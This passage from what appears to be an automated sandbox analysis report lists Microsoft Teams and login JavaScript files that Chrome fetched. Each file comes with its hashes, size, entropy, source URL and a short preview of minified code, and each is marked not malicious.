                                                                                                                                                                                                                                                                            MD5:C4A892E39278CEDC5233BACF4DF8FCEB
                                                                                                                                                                                                                                                                            SHA1:E9E7C7155F52AB4332230745D37CF3F3C5045B5D
                                                                                                                                                                                                                                                                            SHA-256:25BC2604925CCF2C530E10ED660E52DDE558B59481780075B0CBFA2C47A48F59
                                                                                                                                                                                                                                                                            SHA-512:8D4857BB6F86EE53B9FD73C5B5D079F8983DAF490203AF559DA824F0A01EB2D4F82C509F3A28D182DC9586DDC9D801C0C50B062C546F28AEF6426A38B337DA98
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/704334-64701d592834bd42.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[704334],{704334:(e,t,a)=>{a.d(t,{NS:()=>n,L8:()=>i,gH:()=>o,hj:()=>r,pD:()=>l,Jk:()=>s,FX:()=>c,X0:()=>d,PX:()=>g,jQ:()=>v,YM:()=>S,_c:()=>f,Yf:()=>y,aQ:()=>I,Wy:()=>w,qd:()=>T,o8:()=>A,YL:()=>k,P2:()=>R,ln:()=>E,Vm:()=>P,lq:()=>D,LW:()=>M,PC:()=>F,hE:()=>L,N_:()=>U,nM:()=>O,T4:()=>N,HZ:()=>V,af:()=>B,Kp:()=>x,g5:()=>W,fp:()=>z,PR:()=>j,vm:()=>q,vd:()=>H,XL:()=>G,tY:()=>Q,cL:()=>J});var n,i,o,r,l,s,c,d,_=a(8435);!function(e){e.PREJOIN="prejoin",e.PLUGIN="plugin"}(n||(n={})),function(e){e.none="None",e.citrix="Citrix",e.vmware="VMware",e.avd="AVD",e.windows365="Windows365",e.citrixSlimCore="CitrixSlimCore",e.vmwareSlimCore="VMwareSlimCore",e.avdSlimCore="AVDSlimCore",e.windows365SlimCore="Windows365SlimCore",e.awsSlimCore="AWSSlimCore"}(i||(i={})),function(e){e.none="",e[e.wvd=43]="wvd",e[e.citrixXenDesktop=44]="citrixXenDesktop",e[e.citrixXenApp=44]="citrixXenApp",e[e.vmware=
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (12648), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):12648
                                                                                                                                                                                                                                                                            Entropy (8bit):5.331618680016599
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:UBvT91sirzk6r/Ta1sirzogFXhFh76cQJ:UBvT3To6jqTkgFXhFh76cQJ
                                                                                                                                                                                                                                                                            MD5:B3688EB03DF81642144495322F067B41
                                                                                                                                                                                                                                                                            SHA1:B1A0AB57D487B8D2F6C6883204DDAD50D74121A9
                                                                                                                                                                                                                                                                            SHA-256:6FE9A5B6A3BB2C20937E96B04EDE350E39C6AEC365BE5DEA991C8AEFE235B9C8
                                                                                                                                                                                                                                                                            SHA-512:C0D86423670A2D99785609EE5A93C59A7384C16751840BC7D7E0A84A9F1CAB4116AB889CA7842456D308443A5650CC855B845C347D472FA07AE250BBAD6C9743
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";var sidecarDiagnostics,sidecarChatZeroState,sidecarMeetApp,sidecarTflOnboarding,sidecarUserContext,sidecarI18nContext,sidecarHtmlSanitizerContext,sidecarAriaLiveContext,sidecarFocusManagementContext;(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[150699],{564961:(e,t,r)=>{var i={".":()=>Promise.all([r.e(587200),r.e(918681),r.e(215111),r.e(750818),r.e(978582),r.e(756854),r.e(769268),r.e(70674),r.e(367927),r.e(268921),r.e(842549),r.e(459628),r.e(664062),r.e(994444),r.e(35871)]).then((()=>()=>r(431810)))},n=(e,t)=>(r.R=t,t=r.o(i,e)?i[e]():Promise.resolve().then((()=>{throw new Error('Module "'+e+'" does not exist in container.')})),r.R=void 0,t),a=(e,t,i)=>{if(i&&(r.tu=i),r.S){var n="default",a=r.S[n];if(a&&a!==e)throw new Error("Container initialization failed as it has already been initialized with a different share scope");return r.S[n]=e,r.I(n,t)}};r.d(t,{get:()=>n,init:()=>a})}},e=>{e.O(0,[921072],(()=>(564961,e(e.s=5649
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (21454)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):21562
                                                                                                                                                                                                                                                                            Entropy (8bit):5.424010842422398
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:7BoFIRCwFqM/rQ5DTfZTri6i4YubScRBCFFok2wdZdxG75zEB1x9I40f/H2Yhgun:7BhRCmx/rQ5DTfZT44YubScSFFokTG7J
                                                                                                                                                                                                                                                                            MD5:1751D27DC4FAD84D22D1253C96D5D481
                                                                                                                                                                                                                                                                            SHA1:470F9278EF64F1B63803A529E88E5949465BE894
                                                                                                                                                                                                                                                                            SHA-256:8D1A40C557DF1C83825E226A2294E281D68E6EC539BC4B4AF4F274D1F12C1266
                                                                                                                                                                                                                                                                            SHA-512:6761EFB44EFE1974B7C88E80C12E6EFCA4147B59447B7BDC947E31D1149A816AC893C28333292966617ABD27336983662EA8E76DFF590C76F9EFF05E0ADD84C4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[789291],{289712:(e,t,n)=>{n.d(t,{b:()=>u});var a=n(362328),r=n(300474),i=n(930722),s=n(466548),o=n(441065),l=n(40341);const u={kind:"Document",get definitions(){const e=(0,a.G)("fragment DataFragmentsCommonChatFragment on Conversation {id,title,shortTitle,creator,tenantId,picture,guardianChatInfo,isBotBlocked,isOneOnOne,isOneOnOneBotChat,isDisabled,isMuted,lastMessage {id,...DataFragmentsCommonChatListItemLastMessageFragment},...DataFragmentsCommonChatListItemLastUpdateFragment @include(if:$includeLastUpdate),lastContentMessageTime,memberCount,me {...userFields},membersLimited {...userFields},hasTflSmsUser,hasFederatedUser,hasTflSmsVerifiedUser,hasTflConsumerUser,cfet,hasTypingUsers,chatHistoryHiddenTime,clearHistoryTime,interopConversationStatus,tflOffNetworkUser {...userFields},tflOffNetworkUserLength,isUserMember,userConsumptionHorizon {...consumptionHorizonBookmarkFields}
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65520), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):917934
                                                                                                                                                                                                                                                                            Entropy (8bit):4.809994849179831
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24576:BqNfbMPUhKSJeKHn9Wrf+wSKlgepvy4I+q:oNXJ7Wrf+wSKlbvy1+q
                                                                                                                                                                                                                                                                            MD5:A13556D95478DF3BA90F1EAD52F72118
                                                                                                                                                                                                                                                                            SHA1:6004D6DE85E383BD76FE027A5F5F017A0B20F6AC
                                                                                                                                                                                                                                                                            SHA-256:384AAA0556A1E8C567EA68F83E8A0F83ECAF06843F33EF57D824FCB2FD3218D8
                                                                                                                                                                                                                                                                            SHA-512:11B6BC4653405DD38FBE2B483E090609C481D53A6D5DAA040A0657BF1D21163B40BDB68B4969DB11768688BA5B7A6A55A5BDCC07309279FAEA5B0C184C691FD2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[531106],{592150:(e,t,a)=>{a.r(t),a.d(t,{default:()=>o});const o={namespace:"activity",locale:"en-us",translations:{activity_app_name:"Activity",activity_contextual_settings_undo_button:"Undo",activity_esp_chat_recommendation_description:"Start a chat with a coworker or bring everyone together in a group chat",activity_esp_chat_recommendation_title:"Stay in touch using chat",activity_esp_contact_sync_confirmation_description:"Talk to anyone from your contact list.",activity_esp_contact_sync_confirmation_title:"Google contacts synced",activity_esp_files_recommendation_description:"Share all types of files like PDFs, documents or photos",activity_esp_files_recommendation_title:"Share and collaborate on files in chat",activity_esp_meeting_recommendation_description:"Try out meeting backgrounds, reactions, and more",activity_esp_meeting_recommendation_title:"Meet now or later",act
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (10182)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):10290
                                                                                                                                                                                                                                                                            Entropy (8bit):4.425385956221975
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:qt5HUtKw504Rm5KDkCNDxSyBbsswz0yGo7diOj1cShp:wxEJ0gmdCjSyBbsswz0Xedlp
                                                                                                                                                                                                                                                                            MD5:E21950488A8D58585B1C5DD898AF5096
                                                                                                                                                                                                                                                                            SHA1:CA6B4151F4ABC2327A82CCC457288B9B49060FE2
                                                                                                                                                                                                                                                                            SHA-256:95094BC43EEF7AC9BA858C4F44F5D6A0D068F1957739B83A1C7C7F0E1E7A4D41
                                                                                                                                                                                                                                                                            SHA-512:E3BD27D664BECE838E10C868F34B5D9EAAC656E28E76BFE1B43A66B175411A7ADBCBBDEAA071F5E0C80416EEC57B9E2E3B73B9C40772039E95F8787AB0DDE5EF
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[867529],{867529:(a,l,Z)=>{Z.d(l,{VOc:()=>m,F$A:()=>c,xwX:()=>e,l3w:()=>M,uE4:()=>t,CSm:()=>L,a4W:()=>i,OUC:()=>s,nVo:()=>u,b4K:()=>H,PLv:()=>r,ZDw:()=>U,mRs:()=>T,gaL:()=>A,K2C:()=>g,zqF:()=>v,SqZ:()=>R,FKn:()=>V,if_:()=>F,i5S:()=>d,uhv:()=>k,MyB:()=>n,dDm:()=>x,vR$:()=>C});var h=Z(693935);const m=(0,h.U)("Tag20Filled","20",["M18 4.03a2 2 0 0 0-1.98-2L11.12 2a2 2 0 0 0-1.42.59L3.02 9.25a2 2 0 0 0 0 2.83l4.95 4.95a2 2 0 0 0 2.83 0l6.63-6.63A2 2 0 0 0 18 8.98V4.03ZM14 7a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"]),c=(0,h.U)("Tag20Regular","20",["M14 7a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm-2.87-5a2 2 0 0 0-1.43.58L3.02 9.25a2 2 0 0 0 0 2.83l4.95 4.95a2 2 0 0 0 2.83 0l6.63-6.63A2 2 0 0 0 18 8.98V4.03a2 2 0 0 0-1.99-2L11.12 2Zm-.72 1.3a1 1 0 0 1 .71-.3l4.9.03a1 1 0 0 1 .99 1v4.95a1 1 0 0 1-.29.7l-6.63 6.64a1 1 0 0 1-1.41 0l-4.95-4.95a1 1 0 0 1 0-1.41l6.68-6.67Z"]),e=(0,h.U)("TagMultiple20Filled","20",
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (22637)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):22745
                                                                                                                                                                                                                                                                            Entropy (8bit):5.323982641842712
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:gxOaUKs4Lk5+4K+oaNlZFe2JgAf4MsehMINWsIpCeG:gxOaG4oNFJgA1skXb
                                                                                                                                                                                                                                                                            MD5:B09B077BA8260002A8EADCD5EB4708B1
                                                                                                                                                                                                                                                                            SHA1:506936BA470B4ADBBC2D737500DCA02496535545
                                                                                                                                                                                                                                                                            SHA-256:377E85D7D26E4F888ECC278631C3362545B51A397CE6E74AAB3F1418DF5F8F7A
                                                                                                                                                                                                                                                                            SHA-512:8E98EB4E1DA92332ABDB9ACBA83B1BF8347080B2C1236300081DB71404599D684A9724FEFCF714A121EBBC82D415E308152E34410791C2D38C4CD52A61D85732
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/725973-6805c0080a1be3a7.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[725973],{165451:(e,n,t)=>{t.d(n,{Q:()=>o});var r=t(240364),o=function(e){var n=(0,r.b)(Object.assign({},e,{vertical:!0}));return Object.assign({},n,{attributes:Object.assign({},n.attributes,{root:Object.assign({},n.attributes.root,{disabled:e.disabled,"aria-disabled":e.disabledFocusable})})})}},31007:(e,n,t)=>{t.d(n,{f:()=>C,K:()=>N});var r=t(112882),o=t.n(r),a=t(504405),s=t(382883),i=t(996665),l=t(301078),u=t(390956),c=t(31828),p=t(628266),d=t(152450),m=t(121121),f=t(62600),b=t(513432),v=t(382462),y=t(655008),g=t(278459),C="ui-toolbar__customitem",N=function(){var e=(0,s.A)((function(e,n,t){var r,s=(0,i.P3)(),f=(0,l.J)(t.displayName,s.telemetry),y=f.setStart,C=f.setEnd;y();var N=e.accessibility,P=e.children,h=e.className,k=e.content,I=e.design,O=e.fitted,S=e.focusable,T=e.styles,_=e.variables,w=b.useContext(g.g),E=(0,u.W)(N,{debugName:t.displayName,rtl:s.rtl}),F=(0,c.I)(t.di
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (16821)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):16967
                                                                                                                                                                                                                                                                            Entropy (8bit):4.681851562181058
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:nbZwQXd5Bb3yaqArKvqY7hH0jO6Rt6plXnF9:nDXd5Bb3yaqArQ/7OTWh
                                                                                                                                                                                                                                                                            MD5:FC8EAA63A015BE67159AFD0CB0234119
                                                                                                                                                                                                                                                                            SHA1:901AE17C3F155C4C05DD1E7D40A329AD4CE43EA9
                                                                                                                                                                                                                                                                            SHA-256:CCAF6E623667D96CD9AED78F610A9B9694A490095A1154E13BF6E2BF0C1C1499
                                                                                                                                                                                                                                                                            SHA-512:578AFB231C0063F173C8641DE7A5285C2D762E5366C241A6062BAF16F8F37692A1017C1BB36FCE1FFD80526A8D81C5A415B1F4F8EB21FD3E2A36E3752B1C8B0E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[62600],{629050:(e,t,o)=>{o.r(t),o.d(t,{default:()=>i});const i={namespace:"meetingCollaboration",locale:"en-us",translations:{ai_disclosure_text:"AI-generated content may be incorrect",ai_generated_text_in_copy_to_clipboard:"AI-generated content. Be sure to check for accuracy.",app_signin_text:"For me to reference {{appName}}, you'll need to sign in. Once you do, resubmit your request.",breakout_rooms_commanding_not_supported_one_to_one_call:"Breakout rooms are not supported for One to One call",breakout_rooms_commanding_not_supported_recap:"Breakout rooms are not supported in recap copilot",calling_open_text_watermark:"Ask me anything about this call",chat_copilot_commanding_error:"Sorry, something went wrong.",chat_copilot_info_description_1:"Copilot can summarize the conversation and key takeaways.",chat_copilot_info_header_1:"Chat highlights",chat_highlights_from_the_past
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (32016)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):57510
                                                                                                                                                                                                                                                                            Entropy (8bit):5.3728935008680745
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:ABqF1tlfretkF7IKbVaqDRx3P7ym+d/Px25+1wtv+ixn/TPRUbx3VDg/MvA5Gl:ABrkF7IyJ/7ym+d/Po5+1wtv+iJig/Ml
                                                                                                                                                                                                                                                                            MD5:23C7FEEF919F9374C1B26F019804CDA8
                                                                                                                                                                                                                                                                            SHA1:3E22BA24CFD4F5A1C4D189AAADB1A82A867377C0
                                                                                                                                                                                                                                                                            SHA-256:993A5748DB7B6BC125F88788845A7599234130BCE2858B528071035488CB886D
                                                                                                                                                                                                                                                                            SHA-512:93D4D19CA4BACFC0AD64690E2426D573D47991DAF772D178D5C477369675539274A5E97C666A97A49AD0EC82E566EF4B71E967E7D7FFC575FBD2171E06791276
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:!function(e){function o(n){if(i[n])return i[n].exports;var t=i[n]={exports:{},id:n,loaded:!1};return e[n].call(t.exports,t,t.exports,o),t.loaded=!0,t.exports}var i={};return o.m=e,o.c=i,o.p="",o(0)}([function(e,o,i){i(2);var n=i(1),t=i(5),r=i(6),a=r.StringsVariantId,s=r.AllowedIdentitiesType;n.registerSource("str",function(e,o){if(e.WF_STR_SignupLink_AriaLabel_Text="Create a Microsoft account",e.WF_STR_SignupLink_AriaLabel_Generic_Text="Create a new account",e.CT_STR_CookieBanner_Link_AriaLabel="Learn more about Microsoft's Cookie Policy",e.WF_STR_HeaderDefault_Title=o.iLoginStringsVariantId===a.CombinedSigninSignupV2WelcomeTitle?"Welcome":"Sign in",e.STR_Footer_IcpLicense_Text=".ICP.13015306.-10",o.oAppCobranding&&o.oAppCobranding.friendlyAppName){var i=o.fBreakBrandingSigninString?"to continue to {0}":"Continue to {0}";e.WF_STR_App_Title=t.format(i,o.oAppCobranding.friendlyAppName)}switch(o.oAppCobranding&&o.oAppCobranding.signinDescription&&(e.WF_STR_Default_Desc=o.oAppCobrand
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (32934)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):33042
                                                                                                                                                                                                                                                                            Entropy (8bit):5.117647704244785
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:26d7IlYfTyjhT2OHvcN4h7UainvhdKPcHw:Ny2OHvcN8Ag
                                                                                                                                                                                                                                                                            MD5:F021AFE4DA1C87CA9B21A43B34C8C2F8
                                                                                                                                                                                                                                                                            SHA1:7E4D35559E5220734EF5A375B961755F42E425C8
                                                                                                                                                                                                                                                                            SHA-256:C2FD338DD8293E2D65D231EF2405DEC9A159B31A8824F5CDA85B34EF00254E00
                                                                                                                                                                                                                                                                            SHA-512:CFD9CC6BBACF232767C613421F9332C09E049009C0851D1E18D8477C934EDE25F38A2DF76A154DB9E7DE0C29F37C9B493B347449FE88A77745E1DE14DD5D165A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[349794],{989051:(e,o,t)=>{var r,n;t.d(o,{hB:()=>r,Tp:()=>n,Qq:()=>a}),function(e){e.Generic="Generic",e.Error="Error",e.UserAction="UserAction",e.Activity="Activity",e.DNM="DNM"}(r||(r={})),function(e){e.Success="Success",e.Failure="Failure",e.Cancelled="Cancelled"}(n||(n={}));const a={Bool:"Bool",Int64:"Int64",Double:"Double"}},934340:(e,o,t)=>{t.d(o,{LJ:()=>k,IA:()=>c,hO:()=>d,Ot:()=>s,o4:()=>h});var r=t(989051),n=t(841544),a=t(160462);const l=["facetCodes","statusCode","innerMostErrorCode","sprequestguid"];function m(e){const o=/[A-Z0-9._%`'+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}/gi;return Object.getOwnPropertyNames(e).map((t=>{if(-1===t.toLowerCase().indexOf("message")&&-1===t.toLowerCase().indexOf("error")&&-1===t.toLowerCase().indexOf("stack")&&!1===l.includes(t))return;let r=e[t];void 0!==r&&"string"==typeof r&&(r=r.toString().replace(o,"scrubbed_email"),e[t]=(0,a.ku)(r.toString(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (42589)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):42697
                                                                                                                                                                                                                                                                            Entropy (8bit):5.306103537895922
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:OLFeJjTEvUcMRMBotO1UnG53QDxl/LVSkOpNWxuChue15NMjMx/iGrapPRPoB1:AFeCdeTzLVSkOpNWxuChue15NSkq0aG1
                                                                                                                                                                                                                                                                            MD5:5B258984C7A1B2EBB8BEC03203900B30
                                                                                                                                                                                                                                                                            SHA1:1D1379B79314140133A0E92CFF59640F71CB4E77
                                                                                                                                                                                                                                                                            SHA-256:B99452833C8335DAB1D0556362AE38678020909B5AFCDC40E192FCB9E334C00E
                                                                                                                                                                                                                                                                            SHA-512:FF404A1B12D25E707ED9B468E67A34B92EAA6197B0EA5E840A7743FF0594870531D33875708A5540F8A4C4E5DF29F19457005A7D6E31066898707AB6B64E1DA2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/415696-84aae4e642014140.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[415696],{337327:(e,t,i)=>{var n,o;i.d(t,{G:()=>n,T:()=>o}),function(e){e.Sync="Sync",e.Unsync="Unsync",e.Details="Details"}(n||(n={})),function(e){e.navigation="navigation",e.contactsSyncSettingsMutation="contacts_sync_settings_mutation",e.googleContactsSyncSettingsMutation="google_contacts_sync_settings_mutation",e.externalAccountHardDeleteMutation="external_account_hard_delete_mutation"}(o||(o={}))},415696:(e,t,i)=>{i.d(t,{FM:()=>ot,Tx:()=>nt,fV:()=>at,EO:()=>tt,do:()=>ht,km:()=>St,k5:()=>wt,m_:()=>lt,Bs:()=>dt,b7:()=>st,rK:()=>gt,GC:()=>Ct,OB:()=>pt,x4:()=>_t,si:()=>rt,Gd:()=>bt,U7:()=>kt,UJ:()=>it,jm:()=>ft,dS:()=>yt,vn:()=>mt,Dr:()=>vt});var n=i(337327),o=i(957032),a=i(626388),s=i(336086),c=i(727572),r=i(302086);const l=()=>{const e=(0,c.PO)().stringTranslate("people","privacy_settings_manage_blocked_users_empty_list_text");return(0,s.s)(e),(0,o.Y)(r.D,{"data-tid":"block
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14782)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):15755
                                                                                                                                                                                                                                                                            Entropy (8bit):5.366543080044668
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:DveX/4OSgcn2ZU2ZfeXOh+rF3X1qDZD4zfXdv79HU:q/9i57hU
                                                                                                                                                                                                                                                                            MD5:630831903F4BA9060856520624E34CFC
                                                                                                                                                                                                                                                                            SHA1:36DC15B9CCC3FC8EF627354BF55EF44EBD10E203
                                                                                                                                                                                                                                                                            SHA-256:BC6804D058D5BD5B24FC04E479FC8973BEF5D3EFEAFAA9C19C60A009BF0FAC0B
                                                                                                                                                                                                                                                                            SHA-512:1B0759972BBAB0B1A11D54849051E6782600B74FADB1CAF1BD58D214F484E35154907CA7F396EDB1C81A7CDC6F264D138267FB58FD89E1BA3A4D67366EE7E8B0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js
                                                                                                                                                                                                                                                                            Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[17],{519:function(e,n,s
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):303412
                                                                                                                                                                                                                                                                            Entropy (8bit):5.40370027576381
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:KD2jvRESO35Ffqbc2m55TFqeScmuoqhIYZMz5R3L77:KD2jvRESO35Ffqbc2k5TFGcmu7hIYZCj
                                                                                                                                                                                                                                                                            MD5:4E0F902A44033710EEA69C0C9B3BEEE0
                                                                                                                                                                                                                                                                            SHA1:DF1A4F76A5C3B80FC9F6D3311A2C0BB15691F782
                                                                                                                                                                                                                                                                            SHA-256:B17A8D3BDB6CDFFB6540C74CC24052297F660032AC37DAB890A275EB2DB37519
                                                                                                                                                                                                                                                                            SHA-512:C25E4564633EDF20082CBD3A79B3695989424B37756F1F5386C29FF792F93790B763C5979A0FB4ED4E532B285126D53B68D1D8C5FB7C3E85019FB6CF4913D8C4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[230194],{453766:(e,r,o)=>{o.d(r,{J:()=>n});var a=o(888846),t=o(698099),n=function(){return{attributes:{root:{role:"toolbar"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:a.E.bidirectionalDomOrder}},childBehaviors:{item:t.i}}}},698099:(e,r,o)=>{o.d(r,{i:()=>n});var a=o(953543),t=o(504405),n=function(e){var r;return{attributes:{wrapper:{role:"presentation"},root:(r={role:"button",tabIndex:0,"aria-haspopup":e.hasMenu?"true":void 0,"aria-disabled":e.disabled,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-describedby"]},r[t.P]=!0,r)},keyActions:{wrapper:{performClick:{keyCombinations:[{keyCode:a.rC.Enter},{keyCode:a.ZG}]},closeMenuAndFocusTrigger:{keyCombinations:[{keyCode:a.rC.Escape}]},openMenu:!e.vertical&&{keyCombinations:[{keyCode:a.rC.ArrowDown}]},doNotNavigateNextParentItem:{keyCombinations:e.hasMen
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):3886746
                                                                                                                                                                                                                                                                            Entropy (8bit):5.391995387658667
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:49152:bFEqeRKTEJpWXa2Pyr7WrZ9s4SwwP2BIoortbDhqzAVNHI/Jwjka+O4jdTtk18p9:oVs1
                                                                                                                                                                                                                                                                            MD5:28623544BBB4E5FC02CD8DAFE548322F
                                                                                                                                                                                                                                                                            SHA1:8C8EB4A60C427BD5D0F60BF5EA4AD485D78B773E
                                                                                                                                                                                                                                                                            SHA-256:89416D1F024D76DD96F7ECDE58541D0F0B8B9382EE8E435AD64B42E89DD10666
                                                                                                                                                                                                                                                                            SHA-512:FDB5EBDA54583DC84EB4A5B7F980AD28FDAAA83F60FC96107BD9ACA7C754493E353A5BAA3C8A62B5BB7A0BE81BC51F12DF33DFD868D6A3507B94DB12E5C3366F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/async-entry-30ceeed1b130572d.js
